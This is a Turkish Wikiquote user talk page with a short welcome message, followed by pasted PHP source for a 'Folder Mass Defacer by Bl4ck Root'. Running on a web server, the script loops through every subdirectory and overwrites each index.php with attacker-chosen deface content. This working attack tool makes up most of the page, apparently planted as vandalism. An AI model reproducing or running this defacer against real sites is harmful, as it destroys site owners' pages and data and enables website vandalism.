Cihan Davşan
Fikirlerimize kurşun işlemez
Hoş geldiniz
değiştirMerhaba Cihan Davşan, önemli ve özlü sözlerin tek bir çatı altında toplanması projesi olan Vikisöz'e hoş geldin | ||||
---|---|---|---|---|
Kolay gelsin...New user message (mesaj) 14.51, 31 Ekim 2019 (UTC) |
<?php echo "<title>Folder Mass Defacer by Bl4ck Root</title>"; echo "<link href='http://fonts.googleapis.com/css?family=Electrolize' rel='stylesheet' type='text/css'>"; echo "<body bgcolor='gray'>";
echo "
echo "<img src='https://image.spreadshirtmedia.net/image-server/v1/designs/14727496,width=178,height=178,version=1385625201/fuck-anonymous-mask.png'>
Target Folder
<input cols='10' rows='10' type='text' style='color:lime;background-color:#000000' name='base_dir' value='".getcwd ()."'>
";
echo "Name of File
<input cols='10' rows='10' type='text' style='color:lime;background-color:#000000' name='andela' value='index.php'>
";
echo "Script Deface
<textarea cols='25' rows='8' style='color:lime;background-color:#000000;background-image:url(http://ac-team.ml/bg.jpg);' name='index'>Hacked by Bl4ck Root</textarea>
";
";
if (isset ($_POST['base_dir'])) {
if (!file_exists ($_POST['base_dir'])) die ($_POST['base_dir']." Not Found !
"); if (!is_dir ($_POST['base_dir'])) die ($_POST['base_dir']." Is Not A Directory !
"); @chdir ($_POST['base_dir']) or die ("Cannot Open Directory"); $files = @scandir ($_POST['base_dir']) or die ("Fuck u -_-
"); foreach ($files as $file): if ($file != "." && $file != ".." && @filetype ($file) == "dir") { $index = getcwd ()."/".$file."/".$_POST['andela']; if (file_put_contents ($index, $_POST['index']))
echo "
>> $index    (✓)";
} endforeach;
}
?>